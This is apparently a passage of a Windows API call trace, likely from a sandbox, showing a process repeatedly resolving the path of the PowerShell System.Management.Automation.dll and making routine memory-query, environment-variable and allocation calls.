	[0345.062] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.062] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.062] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.063] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.063] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.063] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.063] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.063] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.064] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.064] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.064] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.064] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.065] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.065] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.065] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.065] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.065] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.065] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.066] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c260, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.066] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.066] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.343] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.382] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.382] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.382] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.382] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c1f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.383] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.383] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c140, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0345.383] VirtualQuery (in: lpAddress=0x14b870, lpBuffer=0x14c730, dwLength=0x30 | out: lpBuffer=0x14c730*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0345.591] CoTaskMemAlloc (cb=0x104) returned 0x1f7900
	[0345.591] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7900, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0345.591] CoTaskMemFree (pv=0x1f7900) 
	[0345.593] VirtualQuery (in: lpAddress=0x14b870, lpBuffer=0x14c730, dwLength=0x30 | out: lpBuffer=0x14c730*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0345.598] CoTaskMemAlloc (cb=0x104) returned 0x1f7900
	[0345.598] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7900, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0345.598] CoTaskMemFree (pv=0x1f7900) 
	[0345.599] CoTaskMemAlloc (cb=0x104) returned 0x1f7900
	[0345.599] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7900, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0345.599] CoTaskMemFree (pv=0x1f7900) 
	[0345.599] CoTaskMemAlloc (cb=0x104) returned 0x1f7900
	[0345.599] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7900, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0345.599] CoTaskMemFree (pv=0x1f7900) 
	[0345.600] CoTaskMemAlloc (cb=0x104) returned 0x1f7900
	[0345.600] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7900, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0345.600] CoTaskMemFree (pv=0x1f7900) 
	[0345.604] CoTaskMemAlloc (cb=0x104) returned 0x1f7900
	[0345.604] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7900, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0345.604] CoTaskMemFree (pv=0x1f7900) 
	[0345.605] CoTaskMemAlloc (cb=0x104) returned 0x1f7900
	[0345.605] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7900, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0345.605] CoTaskMemFree (pv=0x1f7900) 
	[0345.609] VirtualQuery (in: lpAddress=0x14b870, lpBuffer=0x14c730, dwLength=0x30 | out: lpBuffer=0x14c730*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0345.609] VirtualQuery (in: lpAddress=0x14b870, lpBuffer=0x14c730, dwLength=0x30 | out: lpBuffer=0x14c730*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0345.940] VirtualQuery (in: lpAddress=0x14b870, lpBuffer=0x14c730, dwLength=0x30 | out: lpBuffer=0x14c730*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0345.944] CoTaskMemAlloc (cb=0x104) returned 0x1f7900
	[0345.944] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7900, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0345.944] CoTaskMemFree (pv=0x1f7900) 
	[0346.570] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x1f7d40
	[0346.572] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x1f7e50
	[0347.667] VirtualQuery (in: lpAddress=0x14b870, lpBuffer=0x14c730, dwLength=0x30 | out: lpBuffer=0x14c730*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.369] VirtualQuery (in: lpAddress=0x14b870, lpBuffer=0x14c730, dwLength=0x30 | out: lpBuffer=0x14c730*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.372] VirtualQuery (in: lpAddress=0x14b870, lpBuffer=0x14c730, dwLength=0x30 | out: lpBuffer=0x14c730*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.372] VirtualQuery (in: lpAddress=0x14a2c0, lpBuffer=0x14b180, dwLength=0x30 | out: lpBuffer=0x14b180*(BaseAddress=0x14a000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.402] VirtualQuery (in: lpAddress=0x14b870, lpBuffer=0x14c730, dwLength=0x30 | out: lpBuffer=0x14c730*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.403] VirtualQuery (in: lpAddress=0x14b870, lpBuffer=0x14c730, dwLength=0x30 | out: lpBuffer=0x14c730*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.403] VirtualQuery (in: lpAddress=0x14b870, lpBuffer=0x14c730, dwLength=0x30 | out: lpBuffer=0x14c730*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.403] VirtualQuery (in: lpAddress=0x14b870, lpBuffer=0x14c730, dwLength=0x30 | out: lpBuffer=0x14c730*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.403] VirtualQuery (in: lpAddress=0x14b870, lpBuffer=0x14c730, dwLength=0x30 | out: lpBuffer=0x14c730*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.403] VirtualQuery (in: lpAddress=0x14b870, lpBuffer=0x14c730, dwLength=0x30 | out: lpBuffer=0x14c730*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.403] VirtualQuery (in: lpAddress=0x14b870, lpBuffer=0x14c730, dwLength=0x30 | out: lpBuffer=0x14c730*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.403] VirtualQuery (in: lpAddress=0x14b870, lpBuffer=0x14c730, dwLength=0x30 | out: lpBuffer=0x14c730*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.403] VirtualQuery (in: lpAddress=0x14b870, lpBuffer=0x14c730, dwLength=0x30 | out: lpBuffer=0x14c730*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.403] VirtualQuery (in: lpAddress=0x14b870, lpBuffer=0x14c730, dwLength=0x30 | out: lpBuffer=0x14c730*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.403] VirtualQuery (in: lpAddress=0x14b870, lpBuffer=0x14c730, dwLength=0x30 | out: lpBuffer=0x14c730*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.403] VirtualQuery (in: lpAddress=0x14b870, lpBuffer=0x14c730, dwLength=0x30 | out: lpBuffer=0x14c730*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.404] VirtualQuery (in: lpAddress=0x14b870, lpBuffer=0x14c730, dwLength=0x30 | out: lpBuffer=0x14c730*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.404] VirtualQuery (in: lpAddress=0x14b870, lpBuffer=0x14c730, dwLength=0x30 | out: lpBuffer=0x14c730*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.404] VirtualQuery (in: lpAddress=0x14b870, lpBuffer=0x14c730, dwLength=0x30 | out: lpBuffer=0x14c730*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.404] VirtualQuery (in: lpAddress=0x14b870, lpBuffer=0x14c730, dwLength=0x30 | out: lpBuffer=0x14c730*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.404] VirtualQuery (in: lpAddress=0x14b870, lpBuffer=0x14c730, dwLength=0x30 | out: lpBuffer=0x14c730*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.404] VirtualQuery (in: lpAddress=0x14b870, lpBuffer=0x14c730, dwLength=0x30 | out: lpBuffer=0x14c730*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.404] VirtualQuery (in: lpAddress=0x14b870, lpBuffer=0x14c730, dwLength=0x30 | out: lpBuffer=0x14c730*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.404] VirtualQuery (in: lpAddress=0x14b870, lpBuffer=0x14c730, dwLength=0x30 | out: lpBuffer=0x14c730*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.404] VirtualQuery (in: lpAddress=0x14b870, lpBuffer=0x14c730, dwLength=0x30 | out: lpBuffer=0x14c730*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.404] VirtualQuery (in: lpAddress=0x14b870, lpBuffer=0x14c730, dwLength=0x30 | out: lpBuffer=0x14c730*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.404] VirtualQuery (in: lpAddress=0x14b870, lpBuffer=0x14c730, dwLength=0x30 | out: lpBuffer=0x14c730*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.405] VirtualQuery (in: lpAddress=0x14b870, lpBuffer=0x14c730, dwLength=0x30 | out: lpBuffer=0x14c730*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.405] VirtualQuery (in: lpAddress=0x14b870, lpBuffer=0x14c730, dwLength=0x30 | out: lpBuffer=0x14c730*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.405] VirtualQuery (in: lpAddress=0x14b870, lpBuffer=0x14c730, dwLength=0x30 | out: lpBuffer=0x14c730*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.405] VirtualQuery (in: lpAddress=0x14b870, lpBuffer=0x14c730, dwLength=0x30 | out: lpBuffer=0x14c730*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.405] VirtualQuery (in: lpAddress=0x14b870, lpBuffer=0x14c730, dwLength=0x30 | out: lpBuffer=0x14c730*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.405] VirtualQuery (in: lpAddress=0x14b870, lpBuffer=0x14c730, dwLength=0x30 | out: lpBuffer=0x14c730*(BaseAddress=0x14b000, AllocationBase=0xd0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0348.406] CoTaskMemAlloc (cb=0x104) returned 0x1f7f60
	[0348.406] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7f60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0348.406] CoTaskMemFree (pv=0x1f7f60) 
	[0348.408] CoTaskMemAlloc (cb=0x104) returned 0x1f7f60
	[0348.408] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x1f7f60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0348.408] CoTaskMemFree (pv=0x1f7f60) 
	[0348.408] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x14c4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
